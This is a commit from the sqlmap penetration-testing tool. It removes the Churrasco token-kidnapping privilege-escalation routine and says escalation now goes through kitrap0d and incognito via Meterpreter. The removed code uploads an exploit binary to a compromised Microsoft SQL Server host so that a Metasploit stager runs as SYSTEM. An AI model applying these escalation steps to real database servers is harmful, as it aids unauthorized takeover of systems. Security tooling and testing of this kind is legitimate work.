Get rid of Churrasco (Token kidnapping technique to --priv-esc). Reasons why:

1. there's kitrap0d (MS10-015) which is far more reliable, just recently fixed 2. works only to priv esc basically on MSSQL when it runs as NETWORK SERVICE and the machine is not patched against MS09-012 which is "rare" (hopefully) nowadays. Now sqlmap relies on kitrap0d and incognito to privilege escalate the database process' user privileges to SYSTEM, both via Meterpreter. Minor layout adjustments.
2025-12-07 05:01:30 +00:00 · 2010-03-12 22:43:35 +00:00
parent 6b1ae62753
commit 7d8cc1a482
7 changed files with 21 additions and 94 deletions
--- a/plugins/generic/takeover.py
+++ b/plugins/generic/takeover.py
@@ -54,32 +54,9 @@ class Takeover(Abstraction, Metasploit, Registry):
    def __init__(self):
        self.cmdTblName       = "sqlmapoutput"
        self.tblField         = "data"
-        self.cmdFromChurrasco = False

        Abstraction.__init__(self)

-    def uploadChurrasco(self):
-        msg  = "do you want sqlmap to upload Churrasco and call the "
-        msg += "Metasploit payload stager as its argument so that it "
-        msg += "will be started as SYSTEM? [y/N] "
-
-        output = readInput(msg, default="N")
-
-        if output and output[0] in ( "y", "Y" ):
-            tmpFile = decloakToNamedTemporaryFile(os.path.join(paths.SQLMAP_CONTRIB_PATH, "tokenkidnapping", "Churrasco.exe_"))
-
-            wFile                 = tmpFile.name
-            self.churrascoPath    = "%s/tmpc%s.exe" % (conf.tmpPath, randomStr(lowercase=True))
-            self.cmdFromChurrasco = True
-            
-            self.writeFile(wFile, self.churrascoPath, "binary", confirm=False)
-            
-            tmpFile.close()
-
-            return True
-        else:
-            return False
-
    def osCmd(self):
        stackedTest()

@@ -172,27 +149,6 @@ class Takeover(Abstraction, Metasploit, Registry):
                    debugMsg += "user, no need to privilege escalate"
                    logger.debug(debugMsg)

-                elif kb.dbms == "PostgreSQL":
-                    debugMsg  = "by default PostgreSQL on Windows runs as postgres "
-                    debugMsg += "user which has no access to LSASS: it is "
-                    debugMsg += "unlikely that the privilege escalation "
-                    debugMsg += "via 'incognito' extension will be successful"
-                    logger.debug(debugMsg)
-
-                elif kb.dbms == "Microsoft SQL Server" and kb.dbmsVersion[0] in ( "2005", "2008" ):
-                    debugMsg  = "often Microsoft SQL Server %s " % kb.dbmsVersion[0]
-                    debugMsg += "runs as Network Service which has Windows "
-                    debugMsg += "Impersonation Tokens"
-                    logger.debug(debugMsg)
-
-                    uploaded = self.uploadChurrasco()
-
-                    if not uploaded:
-                        debugMsg  = "beware that the privilege escalation "
-                        debugMsg += "might not work via Churrasco if "
-                        debugMsg += "MS09-012 patch is installed"
-                        logger.debug(debugMsg)
-
            elif kb.os != "Windows" and conf.privEsc:
                # Unset --priv-esc if the back-end DBMS underlying operating
                # system is not Windows